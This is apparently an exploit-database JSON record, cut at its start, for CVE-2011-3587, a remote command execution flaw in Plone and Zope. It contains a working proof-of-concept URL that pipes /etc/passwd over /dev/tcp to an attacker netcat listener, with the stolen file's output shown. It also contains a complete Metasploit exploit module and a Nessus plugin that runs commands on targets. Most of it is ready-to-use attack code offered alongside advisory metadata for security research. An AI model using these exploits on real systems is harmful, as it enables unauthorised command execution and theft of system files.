4040\r\n\r\nOn victim, 
visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72431"}], "metasploit": [{"lastseen": "2020-10-13T00:57:46", "description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.\n", "published": "2011-12-27T06:59:26", "type": "metasploit", "title": "Plone and Zope XMLTools Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": 
"2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/PLONE_POPEN2", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Plone and Zope XMLTools Remote Command Execution',\n 'Description' => %q{\n Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x\n through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute\n arbitrary commands via vectors related to the p_ class in OFS/misc_.py and\n the use of Python modules.\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Plone Security Team, original vulnerability discovery\n 'Nick Miles', # Original exploit\n 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-3587'],\n ['OSVDB', '76105'],\n ['EDB', '18262'],\n ['URL', 'http://plone.org/products/plone/security/advisories/20110928']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic telnet perl ruby python',\n }\n },\n 'Platform' => %w{ linux unix },\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic',{}]],\n 'DisclosureDate' => '2011-10-04',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('URI',[true, \"The path to the Plone installation\", \"/\"]),\n ])\n register_autofilter_ports([ 8080 ])\n end\n\n def check\n uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')\n\n res = send_request_raw(\n {\n 'uri' => uri\n }, 25)\n if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)\n return Exploit::CheckCode::Appears\n end\n # patched == zExceptions.NotFound\n return Exploit::CheckCode::Safe\n end\n\n 
def exploit\n uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')\n\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' =>\n {\n 'cmd' => payload.encoded,\n }\n }, 0.5) # short timeout, we don't care about the response\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/plone_popen2.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPlone and Zope - Remote Command Execution", "edition": 1, "published": "2011-12-21T00:00:00", "title": "Plone and Zope - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-21T00:00:00", "id": "EXPLOITPACK:B47D124EE589B60CD13076B667252C83", "href": "", "sourceData": "# Exploit Title: Plone - Remote Command Execution\n# Date: 12/21/2011\n# Author: Nick Miles (www.npenetrable.com)\n# Tested on: 12/21/2011\n# CVE : CVE-2011-3587\n\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\nVersions Not Affected: Versions of Plone that use Zope other than Zope\n2.12.x and Zope 2.13.x.\n\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\n\nYou can execute any command on the remote Plone server with the\nfollowing request\nif the server is Unix/Linux based (Note: you won't get returned the\nresults of the command):\n\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\nto run>\n\nExample:\n\nListen for a connection:\n$ nc -l 4040\n\nOn victim, visit:\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\n\nResponse:\n$ nc -l 
4040\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\napache:x:48:48:Apache:/var/www:/sbin/nologin\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\nplone:x:500:500::/home/plone:/bin/false", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T13:26:31", "description": "The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. 
Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.", "edition": 27, "published": "2011-12-20T00:00:00", "title": "Plone Request Parsing Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-20T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20110928.NASL", "href": "https://www.tenable.com/plugins/nessus/57350", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57350);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3587\");\n script_bugtraq_id(49857);\n\n script_name(english:\"Plone Request Parsing Remote Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host allows arbitrary remote code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. 
Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/20110928\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20110928\");\n # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b32a0de5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneHotfix20110928/1.0/\");\n script_set_attribute(attribute:\"solution\", value:\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Plone RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Plone and Zope XMLTools Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Verify the vuln exists (regardless of whether we can exploit it)\nos_module = \"p_/webdav/xmltools/minidom/xml/sax/saxutils/os\";\nurl = dir + \"/\" + os_module;\n\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"<module 'os' from '\" >!< res[2])\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\n# it looks like only Unix Systems have popen2 compiled in,\n# so this shouldn't work on Windows - but we can try anyways\nfile_name = SCRIPT_NAME + \"-\" + unixtime();\nunix_command = urlencode(str:\"touch /tmp/\"+ file_name);\nwindows_command = urlencode(str:\"echo \" + SCRIPT_NAME + \" > %windir%/temp/\"+file_name);\n\nverify_instructions =\n'An attempt was made to create a temporary file on the remote host.\\n'+\n'You can verify its existence by checking for it at the following\\n'+\n'path';\n\nos = get_kb_item(\"Host/OS\");\nif (os && 
report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's:\\n\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n }\n else\n {\n commands = make_list(unix_command);\n verify_instructions += ':\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n }\n}\nelse {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's (dependent on host operating system):\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n}\n\ncommand_success = FALSE;\nurl_list = make_list();\n\nforeach command (commands)\n{\n url = dir + \"/\" + os_module + \"/popen2?cmd=\" + command;\n url_list = make_list(url_list, url);\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (\"<open file '<fdopen>'\" >< res[2]) command_success = TRUE;\n}\n\nif (report_verbosity > 0)\n{\n if (command_success)\n {\n report = '\\nNessus was allowed to execute commands on the remote host.\\n' +\n 'The following requests were made:\\n\\n';\n foreach url (url_list)\n report += ' ' + build_url(qs:url, port:port) + '\\n';\n report += '\\n' + verify_instructions;\n }\n else\n {\n report = '\\nNessus was able to determine that the vulnerability exists on the\\n' +\n 'remote host, but was not able to successfully exploit it.\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "type a short description of the vulnerability here\n\nVulnerability Type: Remote Command Execution", 
"modified": "2013-03-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-21", "href": "", "type": "dsquare", "title": "Plone RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}